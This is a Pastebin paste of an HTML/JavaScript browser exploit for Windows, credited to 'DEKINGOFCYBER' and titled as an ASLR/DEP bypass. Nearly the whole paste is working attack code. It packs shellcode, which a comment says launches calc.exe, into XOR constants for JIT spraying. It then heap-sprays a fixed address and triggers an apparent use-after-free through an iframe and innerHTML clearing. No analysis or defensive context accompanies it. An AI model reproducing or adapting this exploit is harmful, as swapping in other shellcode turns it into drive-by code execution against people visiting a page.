API tools faq
paste
Advertisement
Guest User

win exploit_aslr_dep_bypass_calc_exe

a guest
Mar 28th, 2017
68
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.24 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2. <head>
  3. <!-- Shellcode calc.exe -->
  4. <script type="text/javascript">
  5. var F =
  6. "{ var y=(" +
  7. "0x22222222^0x22222222^0x22222222^0x22222222^0x22222222^" +
  8. "0x22222222^0x074fffb8^0x075000ec^0x14eb00b2^0x14eb00b6^" +
  9. "0x14ebd189^0x14ebdb33^0x14eb04b3^0x14ebc031^0x14eb0bb4^" +
  10. "0x14ebb5b0^0x14ebe0f7^0x14ebe8b4^0x14ebfcb0^0x14ebcb03^" +
  11. "0x14eb0189^0x14ebc031^0x14ebbbb4^0x14eb88b0^0x14ebe0f7^" +
  12. "0x14ebffb4^0x14ebffb0^0x14eb4090^0x14eb00b4^0x14eb00b0^" +
  13. "0x14ebcb03^0x14eb0189^0x14ebc031^0x14eba0b4^0x14eba8b0^" +
  14. "0x14ebe0f7^0x14eb31b4^0x14ebe5b0^0x14ebcb03^0x14eb0189^" +
  15. "0x14ebc031^0x14ebbcb4^0x14ebc4b0^0x14ebe0f7^0x14eb52b4^" +
  16. "0x14eb8bb0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14eb91b4^" +
  17. "0x14eb5eb0^0x14ebe0f7^0x14eb0cb4^0x14eb52b0^0x14ebcb03^" +
  18. "0x14eb0189^0x14ebc031^0x14eb65b4^0x14ebc2b0^0x14ebe0f7^" +
  19. "0x14eb8bb4^0x14eb14b0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
  20. "0x14eb63b4^0x14eb02b0^0x14ebe0f7^0x14ebb7b4^0x14eb0fb0^" +
  21. "0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebddb4^0x14ebd0b0^" +
  22. "0x14ebe0f7^0x14ebffb4^0x14ebffb0^0x14eb4090^0x14ebffb4^" +
  23. "0x14eb31b0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebb2b4^" +
  24. "0x14eb71b0^0x14ebe0f7^0x14eb3cb4^0x14ebacb0^0x14ebcb03^" +
  25. "0x14eb0189^0x14ebc031^0x14ebdeb4^0x14eb5ab0^0x14ebe0f7^" +
  26. "0x14eb2cb4^0x14eb02b0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
  27. "0x14ebe1b4^0x14ebb6b0^0x14ebe0f7^0x14eb0db4^0x14ebcfb0^" +
  28. "0x14ebcb03^0x14eb0189^0x14ebc031^0x14eb95b4^0x14eb84b0^" +
  29. "0x14ebe0f7^0x14ebf0b4^0x14ebe2b0^0x14ebcb03^0x14eb0189^" +
  30. "0x14ebc031^0x14ebbcb4^0x14ebaeb0^0x14ebe0f7^0x14eb52b4^" +
  31. "0x14eb8bb0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebe6b4^" +
  32. "0x14ebc2b0^0x14ebe0f7^0x14eb3cb4^0x14eb42b0^0x14ebcb03^" +
  33. "0x14eb0189^0x14ebc031^0x14ebb8b4^0x14ebd9b0^0x14ebe0f7^" +
  34. "0x14eb40b4^0x14eb8bb0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
  35. "0x14eb12b4^0x14eb2bb0^0x14ebe0f7^0x14eb74b4^0x14ebc0b0^" +
  36. "0x14ebcb03^0x14eb0189^0x14ebc031^0x14eb88b4^0x14eb47b0^" +
  37. "0x14ebe0f7^0x14eb50b4^0x14ebd0b0^0x14ebcb03^0x14eb0189^" +
  38. "0x14ebc031^0x14eb5ab4^0x14ebffb0^0x14ebe0f7^0x14eb8bb4^" +
  39. "0x14eb18b0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14eb7cb4^" +
  40. "0x14ebdab0^0x14ebe0f7^0x14ebd3b4^0x14eb01b0^0x14ebcb03^" +
  41. "0x14eb0189^0x14ebc031^0x14ebbcb4^0x14ebc7b0^0x14ebe0f7^" +
  42. "0x14eb8bb4^0x14eb49b0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
  43. "0x14ebffb4^0x14eb98b0^0x14ebe0f7^0x14ebffb4^0x14ebffb0^" +
  44. "0x14eb4090^0x14ebd6b4^0x14eb01b0^0x14ebcb03^0x14eb0189^" +
  45. "0x14ebc031^0x14ebdeb4^0x14ebaab0^0x14ebe0f7^0x14ebffb4^" +
  46. "0x14ebffb0^0x14eb4090^0x14ebc0b4^0x14eb31b0^0x14ebcb03^" +
  47. "0x14eb0189^0x14ebc031^0x14ebe1b4^0x14ebb6b0^0x14ebe0f7^" +
  48. "0x14eb0db4^0x14ebcfb0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
  49. "0x14ebfab4^0x14eb29b0^0x14ebe0f7^0x14ebffb4^0x14ebffb0^" +
  50. "0x14eb4090^0x14ebe0b4^0x14eb38b0^0x14ebcb03^0x14eb0189^" +
  51. "0x14ebc031^0x14eb7bb4^0x14ebe8b0^0x14ebe0f7^0x14eb7db4^" +
  52. "0x14eb03b0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebf0b4^" +
  53. "0x14ebc7b0^0x14ebe0f7^0x14eb24b4^0x14eb7db0^0x14ebcb03^" +
  54. "0x14eb0189^0x14ebc031^0x14eb60b4^0x14eb76b0^0x14ebe0f7^" +
  55. "0x14eb8bb4^0x14eb58b0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
  56. "0x14ebbcb4^0x14ebe8b0^0x14ebe0f7^0x14ebffb4^0x14ebffb0^" +
  57. "0x14eb4090^0x14ebd3b4^0x14eb01b0^0x14ebcb03^0x14eb0189^" +
  58. "0x14ebc031^0x14eb96b4^0x14eb8fb0^0x14ebe0f7^0x14eb4bb4^" +
  59. "0x14eb0cb0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebbdb4^" +
  60. "0x14eb32b0^0x14ebe0f7^0x14ebffb4^0x14ebffb0^0x14eb4090^" +
  61. "0x14eb01b4^0x14eb1cb0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
  62. "0x14ebe6b4^0x14ebc2b0^0x14ebe0f7^0x14eb8bb4^0x14eb04b0^" +
  63. "0x14ebcb03^0x14eb0189^0x14ebc031^0x14eb60b4^0x14eb30b0^" +
  64. "0x14ebe0f7^0x14eb44b4^0x14eb89b0^0x14ebcb03^0x14eb0189^" +
  65. "0x14ebc031^0x14eb97b4^0x14eb44b0^0x14ebe0f7^0x14eb5bb4^" +
  66. "0x14eb5bb0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebefb4^" +
  67. "0x14ebffb0^0x14ebe0f7^0x14ebffb4^0x14ebffb0^0x14eb4090^" +
  68. "0x14eb51b4^0x14eb5ab0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
  69. "0x14ebbcb4^0x14ebe0b0^0x14ebe0f7^0x14ebffb4^0x14ebffb0^" +
  70. "0x14eb4090^0x14eb5fb4^0x14eb58b0^0x14ebcb03^0x14eb0189^" +
  71. "0x14ebc031^0x14eb9ab4^0x14ebbcb0^0x14ebe0f7^0x14ebebb4^" +
  72. "0x14eb12b0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebb8b4^" +
  73. "0x14ebe7b0^0x14ebe0f7^0x14ebffb4^0x14ebffb0^0x14eb4090^" +
  74. "0x14eb01b4^0x14eb6ab0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
  75. "0x14eb00b4^0x14eb00b0^0x14ebe0f7^0x14eb00b4^0x14ebb9b0^" +
  76. "0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebbcb4^0x14ebc5b0^" +
  77. "0x14ebe0f7^0x14eb68b4^0x14eb50b0^0x14ebcb03^0x14eb0189^" +
  78. "0x14ebc031^0x14ebeab4^0x14eb0fb0^0x14ebe0f7^0x14eb87b4^" +
  79. "0x14eb6fb0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebccb4^" +
  80. "0x14eb17b0^0x14ebe0f7^0x14ebffb4^0x14ebffb0^0x14eb4090^" +
  81. "0x14ebf0b4^0x14ebbbb0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
  82. "0x14ebc3b4^0x14ebbbb0^0x14ebe0f7^0x14eb68b4^0x14eb56b0^" +
  83. "0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebeab4^0x14eb0fb0^" +
  84. "0x14ebe0f7^0x14eb9db4^0x14ebbdb0^0x14ebcb03^0x14eb0189^" +
  85. "0x14ebc031^0x14eb33b4^0x14ebcfb0^0x14ebe0f7^0x14eb06b4^" +
  86. "0x14eb3cb0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14ebadb4^" +
  87. "0x14ebb7b0^0x14ebe0f7^0x14ebfbb4^0x14eb80b0^0x14ebcb03^" +
  88. "0x14eb0189^0x14ebc031^0x14eb46b4^0x14eb40b0^0x14ebe0f7^" +
  89. "0x14ebbbb4^0x14eb05b0^0x14ebcb03^0x14eb0189^0x14ebc031^" +
  90. "0x14eb0ab4^0x14eb4cb0^0x14ebe0f7^0x14eb6fb4^0x14eb72b0^" +
  91. "0x14ebcb03^0x14eb0189^0x14ebc031^0x14eb9fb4^0x14ebdeb0^" +
  92. "0x14ebe0f7^0x14ebffb4^0x14eb53b0^0x14ebcb03^0x14eb0189^" +
  93. "0x14ebc031^0x14eb6cb4^0x14ebf9b0^0x14ebe0f7^0x14eb6cb4^" +
  94. "0x14eb61b0^0x14ebcb03^0x14eb0189^0x14ebc031^0x14eb0ab4^" +
  95. "0x14eb0db0^0x14ebe0f7^0x14eb78b4^0x14eb65b0^0x14ebcb03^" +
  96. "0x14eb0189^0x14ebc031^0x14ebc0b4^0x14eb60b0^0x14ebe0f7^" +
  97. "0x14eb90b4^0x14eb90b0^0x14ebcb03^0x14eb0189^0x14eb00b5^" +
  98. "0x14eb04b1^0x14ebe1ff" +
  99. "); return y; }";
  100.  
  101. var S="";
  102. for (var i=1;i<800;i++)
  103. S += "function fct_" + i + "()" + F + " fct_" + i + "();";
  104. eval(S);
  105. </script>
  106.  
  107. <script type="text/javascript">
  108.  
  109. function dword(a)
  110. {
  111. return String.fromCharCode(a & 0xFFFF) + String.fromCharCode(a >> 16);
  112. }
  113.  
  114. function BuildBlock(b, s)
  115. {
  116. s -= 4;
  117. while(b.length * 2 < s) { b += b; }
  118. return b.substring(0, s / 2);
  119. }
  120.  
  121. function Spray()
  122. {
  123. this.blocks = new Array();
  124.  
  125. /* Fill the string with the address of the JIT shellcode. */
  126. var slide = BuildBlock(dword(0x075000BC), 0xa0);
  127.  
  128. /* Creating 0x30000 blocks to fill the freed value. */
  129. for (var i=0;i<0x30000;i++) {this.blocks[i] = [slide].join("");}
  130. }
  131.  
  132. setTimeout(function()
  133. {
  134. document.body.innerHTML ="";
  135. }, 0);
  136.  
  137. window.onload = function()
  138. {
  139. Spray();
  140. document.getElementById("a").innerHTML = "";
  141. Spray();
  142. }
  143. </script>
  144. </head>
  145.  
  146. <body>
  147. <div id="a">
  148. <iframe src="_not_existing_">
  149. </div>
  150. </body>
  151. </html>
  152.  
  153.  
  154.  
  155. BY SIVA ( DEKINGOFCYBER )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!